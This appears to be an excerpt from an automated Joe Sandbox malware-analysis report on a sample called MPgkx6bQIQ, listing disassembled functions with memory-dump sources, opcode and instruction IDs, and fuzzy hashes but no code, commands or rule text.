                                                                                                                                                                                                                                                                                          • Opcode ID: 620fe37f7e73fb5457a9b33b2ac3a76fa3b2ed8b3b9a74e4dfa7cac570db3b65
                                                                                                                                                                                                                                                                                          • Instruction ID: 64328250301a943c4221b3aea1d0af6b203cdad55f8ce28cbce5e8ab6c8a38f2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 620fe37f7e73fb5457a9b33b2ac3a76fa3b2ed8b3b9a74e4dfa7cac570db3b65
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D812035A08310AFC7248F18D881A6FB7E2EF89314F14992DF9958B391DB35EC51CB86
                                                                                                                                                                                                                                                                                          Function 0249DC47 Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 878cf165e9656de38300a8645f53e9724a1b6a64a083f1f7d23b351aa812f187
                                                                                                                                                                                                                                                                                          • Instruction ID: 21afea86dd41f5a60892e9eeef04f3610775b54f4d7209a0a72b3f83f5cee9db
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 878cf165e9656de38300a8645f53e9724a1b6a64a083f1f7d23b351aa812f187
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2710733B499918BEB2C993C8C213A67E930BE7234F2DC7BAE5F5873E5D56548068340
                                                                                                                                                                                                                                                                                          Function 0041D9E0 Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 878cf165e9656de38300a8645f53e9724a1b6a64a083f1f7d23b351aa812f187
                                                                                                                                                                                                                                                                                          • Instruction ID: c9f1a56c5cc6f557c9c63b1b84e3a6a9080bfa3b27e02a379f5ce7dab310694a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 878cf165e9656de38300a8645f53e9724a1b6a64a083f1f7d23b351aa812f187
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75711673B499904BE328893C4C213AB6A830FD6230F2DC77AE5B68B3E5D5698C468345
                                                                                                                                                                                                                                                                                          Function 024B9607 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: d2f966890577f15959edc4de71345d5fecb794fae90f6da87e8e32d5ae83de50
                                                                                                                                                                                                                                                                                          • Instruction ID: de36ed804c9ab8e182757829c74c068bd5bee5c09c245c0698b6f156c0314ed5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2f966890577f15959edc4de71345d5fecb794fae90f6da87e8e32d5ae83de50
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45613836B247105BD719CE29CC806ABB7D3AFC9720F19863DDA95877E0DB7498018B91
                                                                                                                                                                                                                                                                                          Function 004393A0 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: c29b4df180461632eecacba48d8f134bdea426ed1b1ad04d901cf60be31fb9c0
                                                                                                                                                                                                                                                                                          • Instruction ID: e0a57f83dc16a7a8da3cda248db75e741f620206b22b691e391221bf57496f6d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c29b4df180461632eecacba48d8f134bdea426ed1b1ad04d901cf60be31fb9c0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8616837B193105BD718CE69CC9066BB7D2ABCD320F09922EE995833D1CAB88C02C385
                                                                                                                                                                                                                                                                                          Function 024AF397 Relevance: .2, Instructions: 235COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 3c0d2c5577102dd58fbede460a656b1f00c5f7fe775d6732456b41350824bdc2
                                                                                                                                                                                                                                                                                          • Instruction ID: 1408933fbbe84fdaee51728edd8a0a9990c55600a6fb0c74fcf72de1f47a3812
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c0d2c5577102dd58fbede460a656b1f00c5f7fe775d6732456b41350824bdc2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3710927A49AD04BD328893C4C713A67A930BE6230F5EC76EE9F5477E6C566484B8341
                                                                                                                                                                                                                                                                                          Function 0042F130 Relevance: .2, Instructions: 235COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 3c0d2c5577102dd58fbede460a656b1f00c5f7fe775d6732456b41350824bdc2
                                                                                                                                                                                                                                                                                          • Instruction ID: 93e46a8bd3da194c47575791ec0c02f08c3a6f4472264f5d459ff5c5938f4a7b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c0d2c5577102dd58fbede460a656b1f00c5f7fe775d6732456b41350824bdc2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF712827B49AA04BD318893C5C612A66AA30FD2330FEDC77FE9F1473D5D5694C0A8359
                                                                                                                                                                                                                                                                                          Function 024BD307 Relevance: .2, Instructions: 227COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 64b1c9c5f56f139aa65c1abfed3263135776d97135dd74b25c5f35881b33ae15
                                                                                                                                                                                                                                                                                          • Instruction ID: e9499fd3b35013bfdfb2780bda0080a17286a84238018dd27a933cf31434c33b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64b1c9c5f56f139aa65c1abfed3263135776d97135dd74b25c5f35881b33ae15
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA516831B083009FD7259F18C881AAFB7E2EFDA314F25847DE68547365EB70A851CB62
                                                                                                                                                                                                                                                                                          Function 0043D0A0 Relevance: .2, Instructions: 227COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                          • Opcode ID: d3b1f8ca9cd2306118c4550cff8912d32230ac3733702731da7a1d02903a6272
                                                                                                                                                                                                                                                                                          • Instruction ID: c6b6bb5faf057b6a68f3e5ff18d61b6d7d9c128f7451342645401fa614298587
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3b1f8ca9cd2306118c4550cff8912d32230ac3733702731da7a1d02903a6272
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3514831A083009FD7249F18E881A2BB7E2EFDD310F25A93DE58547351EA75DC51C74A
                                                                                                                                                                                                                                                                                          Function 024A9611 Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 2c0d35eb954a9d187377820dd095db1c7b0c4961e6edb85d2e315a33cbd56d54
                                                                                                                                                                                                                                                                                          • Instruction ID: bf71085df876661d669e25b96e9608b415941faa1fc0635b681d23639470b28b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c0d35eb954a9d187377820dd095db1c7b0c4961e6edb85d2e315a33cbd56d54
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D71AE71D043699FEB25CFA9CD817DEBBB2FB80310F18816DD459AB289DB7419468B80
                                                                                                                                                                                                                                                                                          Function 004293AA Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 2c0d35eb954a9d187377820dd095db1c7b0c4961e6edb85d2e315a33cbd56d54
                                                                                                                                                                                                                                                                                          • Instruction ID: bd453bbf85e71c37a0fde588b6316f789c56ba706437bc4c9fe4a45325bf71d6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c0d35eb954a9d187377820dd095db1c7b0c4961e6edb85d2e315a33cbd56d54
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6771AF72D043689FEB25CFA9CD817DDBBB2FB80310F18816DD459AB289DB741946CB84
                                                                                                                                                                                                                                                                                          Function 0249EC17 Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
                                                                                                                                                                                                                                                                                          • Instruction ID: 6cb3b834ed862b087e9e28c07d79473c022ed2728f786756f0f96cf7d45154bd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78612B356083914FCB26CF29C85092F7FE16F96214F4886AFE8E487392D775D805D792
                                                                                                                                                                                                                                                                                          Function 0041E9B0 Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                                                                                                                                                                                                                                                          • Instruction ID: 005a84f34606d807ef7803f473bdaa3d6e6b3e5a6c55ca812da06d8011db77a6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19613839A0C3914FC325CF39C88095B7BE16F96314F4881AEECA54B392D639EC45D796
                                                                                                                                                                                                                                                                                          Function 004369A0 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 7ba3e6278a810d937f1922a5273aecbd9d8bbbb12a7c26b77ce1112573914146
                                                                                                                                                                                                                                                                                          • Instruction ID: 79698480e789f394c927d8fe7c13ac859d6e499323d4242f8a9ce8e9df0e27f7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ba3e6278a810d937f1922a5273aecbd9d8bbbb12a7c26b77ce1112573914146
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75516875608301ABD310AF65DC81B2BB7E5EB9A704F16A83EF58197281D7B8DC00DB96
                                                                                                                                                                                                                                                                                          Function 024A4CF4 Relevance: .2, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 397dd7719a72b64fe6fd9bff4a2b0e0990fccc0e48aff55cf7b07deb802e575f
                                                                                                                                                                                                                                                                                          • Instruction ID: 34fc39c466705ff769e93c7ae6fe5eeb92f6a91a083b29c035cf0869ff73fd15
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 397dd7719a72b64fe6fd9bff4a2b0e0990fccc0e48aff55cf7b07deb802e575f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F516A71A012428BEB28CE28C8B16BFFBE2EF74314B18866ED5975B7C1D7749541C781
                                                                                                                                                                                                                                                                                          Function 024B5897 Relevance: .2, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 9a456be5166b92ab10874784492d9a7357f7a85283333ec6aeb1257d6c9849aa
                                                                                                                                                                                                                                                                                          • Instruction ID: 83bb6f2b74b56125fd2ec8cb28b8c9b50ee4c88551857cd8b60b24245b9ddf35
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a456be5166b92ab10874784492d9a7357f7a85283333ec6aeb1257d6c9849aa
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 755139B15087548FE314DF29D89435BBBE1BB88318F444E2EE4E987350E379D6088F92
                                                                                                                                                                                                                                                                                          Function 00435630 Relevance: .2, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 9a456be5166b92ab10874784492d9a7357f7a85283333ec6aeb1257d6c9849aa
                                                                                                                                                                                                                                                                                          • Instruction ID: c2a6bcafcd54fac281a485024f5f1ed9cd6e16fab59c4b6ddada49184fd56f0c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a456be5166b92ab10874784492d9a7357f7a85283333ec6aeb1257d6c9849aa
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB516BB15087548FE314DF29D49435BBBE1BBC8318F444A2EE4E987351E379DA088F86
                                                                                                                                                                                                                                                                                          Function 02496907 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 896f3fb295f70a3d1d2d868c2c2a0e71ef34daf535ef3f76e5866041dfd6add5
                                                                                                                                                                                                                                                                                          • Instruction ID: 060622529dd8de80e2cc9ab115a6c66add3c6f165184b2fed495c3bfd34f4d67
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 896f3fb295f70a3d1d2d868c2c2a0e71ef34daf535ef3f76e5866041dfd6add5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE6169B16003068FE728CF65D891256FBA1FF46300F1996ADC0998F752E778E9C1CB95
                                                                                                                                                                                                                                                                                          Function 024B1157 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: c7e211e6c2eb9e6b08159abb43e9af5e1aa1d9e93aa804f146ff2ed9fa703b0b
                                                                                                                                                                                                                                                                                          • Instruction ID: d16ddec15bf8a07411d98d344096ee88f460100ebd815a9f2eed39f81e8c53fa
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7e211e6c2eb9e6b08159abb43e9af5e1aa1d9e93aa804f146ff2ed9fa703b0b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91513433A599904BE72A853C5C713EA7AC30FD6230B2DD77BE5B9CB3E1D15988068360
                                                                                                                                                                                                                                                                                          Function 00430EF0 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: c7e211e6c2eb9e6b08159abb43e9af5e1aa1d9e93aa804f146ff2ed9fa703b0b
                                                                                                                                                                                                                                                                                          • Instruction ID: d7cad542098786fb583f31be900ecfd8ec374eacf30312457ad000f908a343a7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7e211e6c2eb9e6b08159abb43e9af5e1aa1d9e93aa804f146ff2ed9fa703b0b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46512433A5A9D04BD32C853C4C623A66AD30BDA330F2DA77BE5B1CB3E1C56D88064355
                                                                                                                                                                                                                                                                                          Function 024AD7E5 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 20d0a7076ca4a073ae36702b2f035087ecf70489209c947b4e4cdcb3c897cb6e
                                                                                                                                                                                                                                                                                          • Instruction ID: 0ca0a613047e6d51947b2ea5fdf20eb428409d5c254390a2e2b1c8ca743a8cdf
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20d0a7076ca4a073ae36702b2f035087ecf70489209c947b4e4cdcb3c897cb6e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2651B673B569004BC71CC93DCDA166AA6D3ABD923076E873DD476C77D8EE78E8028600
                                                                                                                                                                                                                                                                                          Function 0042D57E Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
